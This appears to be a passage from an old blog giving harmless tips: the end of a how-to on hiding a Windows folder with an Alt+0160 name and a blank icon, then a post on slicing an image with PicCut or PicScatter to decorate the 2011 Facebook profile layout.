Next, rename the folder with Alt+[0160], I mean, press Alt key and without releasing, press 0160. Then you can notice that the name of the folder is gone and a simple space appears as the name of the folder, which cannot be displayed.
Proceed by changing the icon of the folder. To do this, right click on the folder and choose Properties > Customize > Change Icon. Here you can find a few invisible icons; just use one of them to create your invisible folder.
That’s it! Your invisible folder is ready.
Here I have selected the folder, so you can identify that something exists there. If it is not selected, nothing can be found. A totally invisible folder is made.

Monday, February 21, 2011

Create New Facebook Profile Layout Hack Using Tagged Photos Easily

A few days back Facebook released the new Facebook profile layout, which is completely different from the old one. One very new feature is Photostream, which shows your recently tagged photos under your profile name, below the new bio.
Someone discovered how to use tagged photos in the photostream creatively to design the new Facebook layout hack. Some stunning examples are shown below.

Want your Facebook Profile to look like This ?

The above image is a demonstration of the effect that can be achieved with the tools below, which allow you to easily turn any image into what you see!

How to Use New Facebook Layout Profile Image Trick

# PicCut: Facebook New Profile Image Trick Picture Generator

PicCut (Link) is a useful online tool that allows you to upload a large picture; it will automatically slice up the image according to the size requirements of the new Facebook profile photo image trick.
A useful addition to this tool is that it lets you select the number of lines in your profile bio. If your profile bio has 1-2 lines, the photostream thumbnails do not line up properly, making the result look misaligned.

# PicScatter: Create Facebook New Profile Image Trick

PicScatter (Link) is a tool similar to PicCut that you can use with the new Facebook profile to make amazing profile pictures, with the added advantage of uploading the image and thumbnails directly to your Facebook profile. This makes it easy to apply the new Facebook profile photo hack to your profile.
As soon as you’ve uploaded your image, you can zoom in and out, drag it around and tell it how many lines of bio (info-text) you have. This last option can help you see if it’d be better to add or remove a bio line to optimize the photo hack effect. When you’re finished, you can download the individual image files in a compressed archive (pic_scatter.zip) or publish them instantly to Facebook. (detailed guide on ampercent)

Using these Generated Profile Photo and Thumbnail Images

Step 1: Upload your desired picture and let PicCut or PicScatter generate the correctly sliced up profile image and 5 thumbnails.
Step 2: Download the generated ZIP file of your images, or manually save them.
Step 3: First, set the image named “profile-pic.jpg” as your Facebook profile picture.
Step 4: Create a new photo album, then upload the other images in the order of their filenames.
Step 5: Tag yourself in all 5 photos, starting with “image5.jpg” and ending with “image1.jpg.”
Step 6: Hide any tagged photos you do not wish to display on your profile. That’s it!